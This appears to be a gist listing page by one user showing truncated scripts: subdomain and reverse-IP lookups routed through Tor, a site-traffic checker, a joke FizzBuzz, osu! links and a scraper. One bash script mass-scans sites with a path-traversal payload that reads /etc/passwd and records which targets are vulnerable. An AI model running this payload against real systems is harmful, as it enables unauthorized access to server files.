This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [ -z $1 ]; then echo "plz"; exit; fi | |
| url="https://akira-api.herokuapp.com/api/subdomainscan?q="; api=() | |
| for site in $(cat $1); do | |
| apa_ni=$(api+=($url); api+=($(basename $site)); echo ${api[@]}; unset api) # wkwkwk | |
| killall -HUP tor; curl -s --socks5 127.0.0.1:9050 ${apa_ni/[[:blank:]]/} | jq -r '.result[] .hasil' & | |
| done; wait; echo "All Done" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| scan() { | |
| common_dir=("cgi-bin" "assets" "icons" "uploads" "img" "image") | |
| payload=".%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | |
| for dir in ${common_dir[@]}; do | |
| get=$(curl --max-time 2 -s --path-as-is "$1$dir/$payload" | grep "root:x") | |
| if [[ -n $get ]]; then | |
| echo "$1 vulnerable" | |
| echo "$1" >> result | |
| else |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| [[ -z $1 ]] && echo -e "$0 [sites]" && exit | |
| domain=$(basename $1) | |
| url=$(curl -w "%{http_code}\n" -s $domain -o /dev/null) | |
| statshow="https://www.statshow.com/www" | |
| if [[ $url -ne 000 ]]; then | |
| result=$(curl -s $statshow/$domain \ | |
| | htmlq --pretty | grep Daily | htmlq --text span \ | |
| | head -n 2 | tail -n 1 2>/dev/null) | |
| echo "$domain" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import sys | |
| from subprocess import PIPE, STDOUT, Popen | |
| cmd = lambda command: Popen( | |
| command, shell=True, | |
| stdin=None, | |
| stdout=PIPE, | |
| stderr=STDOUT, | |
| close_fds=True, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # cod3d by ./meicookies | |
| scan() { | |
| domain=$(basename $1) | |
| date=$(date | awk '{print $4}') | |
| ip=$(dig +short $domain | head -n 1) | |
| if [[ -n $ip ]] | |
| then | |
| resp=$(curl -m 3 -s http://reverse.fay.gg:18/?ip=$ip | jq -r '.data .domain[]' 2>/dev/null) | |
| echo "$resp" >> result.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| It's Python!...but without any control flow statements except for try-except, and no ways to loop except recursion! | |
| Why does this exist??? | |
| """ | |
| def FizzBuzz(start, end): | |
| try: | |
| 0 / end | |
| result = "" | |
| try: | |
| 0 / (start % 3) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Set-ExecutionPolicy -ExecutionPolicy RemoteSigned |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://osu.ppy.sh/beatmapsets/20989 | |
| https://osu.ppy.sh/beatmapsets/1286287 | |
| https://osu.ppy.sh/beatmapsets/320194 | |
| https://osu.ppy.sh/beatmapsets/2184 | |
| https://osu.ppy.sh/beatmapsets/409025 | |
| https://osu.ppy.sh/beatmapsets/16161 | |
| https://osu.ppy.sh/beatmapsets/12570 | |
| https://osu.ppy.sh/beatmapsets/1142364 | |
| https://osu.ppy.sh/beatmapsets/15932 | |
| https://osu.ppy.sh/beatmapsets/1201058 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coded by ./meicookies | |
| import requests as req | |
| from bs4 import BeautifulSoup as bs | |
| import base64, os, time | |
| def clean(): | |
| if os.name == 'nt': | |
| os.system('cls') | |
| else: | |
| os.system('clear') |